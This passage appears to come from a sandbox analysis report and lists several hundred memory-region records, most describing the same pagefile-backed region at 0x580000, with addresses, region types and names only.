start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8352 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8353 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8354 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8355 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8356 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8357 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8358 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8359 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8360 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8361 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8362 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8363 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8364 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8365 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8366 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8367 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8368 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8369 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8370 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8371 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8372 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8373 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8374 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8375 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8376 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8377 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8378 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8379 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8380 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8381 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8382 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8383 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8384 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8385 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8386 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8387 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8388 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8389 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8390 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8391 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8392 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8393 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8394 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8395 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8396 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8397 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8398 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8399 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8401 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8402 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8403 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8404 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8405 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8406 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8407 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8408 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8409 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8410 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8411 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8412 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8413 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8414 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8415 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8416 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8417 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8418 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8419 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8420 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8422 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8423 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8424 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8425 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8426 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8427 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8428 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8429 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8430 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8431 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8432 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8433 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8434 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8435 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8436 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8437 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8438 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8439 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8440 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8441 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8442 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8443 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8444 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8445 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8446 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8447 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8448 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8449 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8450 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8451 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8452 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8453 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8454 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8455 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8456 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8457 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8458 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8459 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8460 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8461 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8462 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8463 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8464 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8465 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8466 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8467 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8468 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8469 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8470 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8471 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8472 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8473 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8474 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8475 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8476 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8477 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8478 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8479 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8480 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8481 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8482 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8483 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8484 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8485 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8486 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8487 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8488 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8489 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8490 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8491 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8492 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8493 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8494 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8495 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8496 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8497 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8498 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8499 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8500 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8501 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8502 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8503 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8504 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8505 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8506 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8507 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8509 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8510 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8511 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8512 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8513 start_va = 0x590000 end_va = 0x593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 8514 start_va = 0x26c0000 end_va = 0x26e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 8515 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8516 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8517 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8518 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8519 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8520 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8521 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8522 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8523 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8524 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8525 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8526 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8527 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8528 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8529 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8530 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8531 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8532 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8533 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8534 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8535 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8536 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8537 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8538 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8539 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8540 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8541 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8542 start_va = 0x580000 